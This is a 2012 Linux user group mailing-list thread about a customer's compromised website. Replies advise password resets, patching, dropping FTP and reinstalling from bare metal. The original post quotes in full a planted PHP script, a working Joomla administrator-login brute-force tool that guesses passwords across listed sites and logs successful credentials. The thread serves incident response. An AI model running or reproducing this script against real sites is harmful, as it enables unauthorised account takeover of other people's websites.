Re: [SLUG] Customer site hacked with brut.php - what to do?

2012-08-21 Thread David Lyon 
I have changed the password on the hosting account.

It won't be possible to reload everything else
because it is an ISP hosted machine.
-- 
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html

Re: [SLUG] Customer site hacked with brut.php - what to do?

2012-08-21 Thread Robert Collins 
On Wed, Aug 22, 2012 at 2:54 PM, Mark Walkom  wrote:
> On 22 August 2012 12:00, David Lyon  wrote:
>
>> I have a customer with a hacked website.
>>
>> When I ftp'd to their web-server I found this wart (listed below - saved as
>> brut.php):
>>
>> How did the hacker put it on my system ? What could it have comprimised ?
>> What
>> can I do to stop further consequences?
>>
>>
> Reset any management/admin passwords to be safe. Make sure everything
> running on the server is up to date - OS, DB, Apache etc.
>
> Get rid of FTP, use SCP and fail2ban.

Reinstall the machine from bare metal. Verify the BIOS against the
vendors version (not 100% fullproof) and discard the filesystem
entirely (take a backup first).

You don't know what has been altered, its not impossible they got
root, and its not impossible that they put a preboot attack in place
too.

-Rob
-- 
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html

Re: [SLUG] Customer site hacked with brut.php - what to do?

2012-08-21 Thread Mark Walkom 
On 22 August 2012 12:00, David Lyon  wrote:

> I have a customer with a hacked website.
>
> When I ftp'd to their web-server I found this wart (listed below - saved as
> brut.php):
>
> How did the hacker put it on my system ? What could it have comprimised ?
> What
> can I do to stop further consequences?
>
>
Reset any management/admin passwords to be safe. Make sure everything
running on the server is up to date - OS, DB, Apache etc.

Get rid of FTP, use SCP and fail2ban.
-- 
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html

[SLUG] Customer site hacked with brut.php - what to do?

2012-08-21 Thread David Lyon 
I have a customer with a hacked website.

When I ftp'd to their web-server I found this wart (listed below - saved as
brut.php):

How did the hacker put it on my system ? What could it have comprimised ?
What
can I do to stop further consequences?

--- brut.php (don't run this) ---



#  GaStRo
-Dz   #
Joomla Speed Brute
Force

Username:
  Ex: Admin ;
administrator
in , administrator ,  ..
sites list:


Pass list





http://Www.sec4ever.com
">
Www.sec4ever.com |
http://Www.gastro-dz.net";>Www.gastro-dz.net


GreetZ To : OxyL - Damane - Th3
Killer Dz - th3 Viper - L3b r1'z - hacker-1420 - Abu Hamid Madridi -  Al l
Dz Hackerz Team
 

";

$sites = explode("\n",file_get_contents($_FILES["sites"]["tmp_name"])); //
Get Sites !

$w0rds = explode("\n",file_get_contents($_FILES["w0rds"]["tmp_name"])); //
Get w0rdLiSt !

$Attack = new Joomla_brute_Force(); // Active Class

foreach($w0rds as $pwd){

foreach($sites as $site){

$Attack->check_it(txt_cln($site),$_POST['usr'],txt_cln($pwd)); // Brute :D
flush();flush();
}

}

}


# Class & Function'z

function txt_cln($value){  return str_replace(array("\n","\r"),"",$value);
}

class Joomla_brute_Force{

public function check_it($site,$user,$pass){ // print result

if(eregi('com_config',$this->post($site,$user,$pass))){

echo "# login successful : $user:$pass -> $site";
$f = fopen("j0s_result.txt","a+"); fwrite($f , "$user:$pass -> $site\n");
fclose($f);
flush();
}else{ echo "# Failed : $user:$pass -> $site"; flush();}

}

public function post($site,$user,$pass){ // Post -> user & pass

$token = $this->extract_token($site);

$curl=curl_init();

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_POST,1);
curl_setopt($curl,CURLOPT_POSTFIELDS,'username='.$user.'&passwd='.$pass.'&lang=en-GB&option=com_login&task=login&'.$token.'=1');

curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

public function extract_token($site){ // get token from source for ->
function post

$source = $this->get_source($site);

preg_match_all("/type=\"hidden\" name=\"([0-9a-f]{32})\" value=\"1\"/si"
,$source,$token);

return $token[1][0];

}

public function get_source($site){ // get source for -> function
extract_token

$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$site."/administrator/index.php");
curl_setopt($curl,CURLOPT_COOKIEFILE,'cookie.txt');
curl_setopt($curl,CURLOPT_COOKIEJAR,'cookie.txt');
curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows; U; Windows NT
5.1; en-US; rv:1.8.1.15) Gecko/2008111317  Firefox/3.0.4');
curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($curl,CURLOPT_TIMEOUT,20);

$exec=curl_exec($curl);
curl_close($curl);
return $exec;

}

}

?>
-- 
SLUG - Sydney Linux User's Group Mailing List - http://slug.org.au/
Subscription info and FAQs: http://slug.org.au/faq/mailinglists.html